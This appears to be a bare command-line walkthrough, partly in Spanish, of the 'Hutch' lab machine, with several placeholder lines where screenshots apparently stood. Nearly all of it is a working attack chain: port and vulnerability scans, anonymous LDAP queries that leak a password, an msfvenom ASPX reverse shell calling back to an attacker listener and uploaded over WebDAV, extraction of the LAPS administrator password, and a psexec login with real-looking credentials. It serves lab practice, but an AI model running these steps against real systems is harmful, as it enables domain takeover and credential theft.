Hutch

nmap -A -p- -oA hutch 192.168.59.122 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA hutch 192.168.59.122

nmap -sU -O -p- -oA hutch-udp 192.168.59.122

nikto -h 192.168.59.122:80

ssh_command.

nmap -sCV -p80,443 192.168.59.122 -oN targeted

ssh_command.

Vemos el nombre para el dc hutch.offsec

ssh_command.

ldapsearch -x -h 192.168.59.122 -D ” -w ” -b “DC=hutch,DC=offsec” | grep sAMAccountName:

ssh_command.

ldapsearch -x -h 192.168.59.122 -D ” -w ” -b “DC=hutch,DC=offsec” | grep description

ssh_command.

crackmapexec smb 192.168.59.122 -u fmcsorley -p CrabSharkJellyfish192

ssh_command.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.59 LPORT=443 -f aspx > hutchreverse.aspx

curl -T ‘/home/kali/Desktop/boxes/Hutch/content/hatchreverse.aspx’ ‘http://192.168.59.122/’ -u fmcsorley:CrabSharkJellyfish192

ssh_command.

cd c:\Program Files\LAPS\

ssh_command.

ldapsearch -x -h 192.168.59.122 -D ‘hutch\fmcsorley’ -w ‘CrabSharkJellyfish192’ -b ‘dc=hutch,dc=offsec’ “(ms-MCS-AdmPwd=*)” ms-MCS-AdmPwd

ssh_command.

python3 /opt/impacket/examples/psexec.py hutch.offsec/administrator:‘OkW.X#2M2Fu2FD’@192.168.59.122

ssh_command.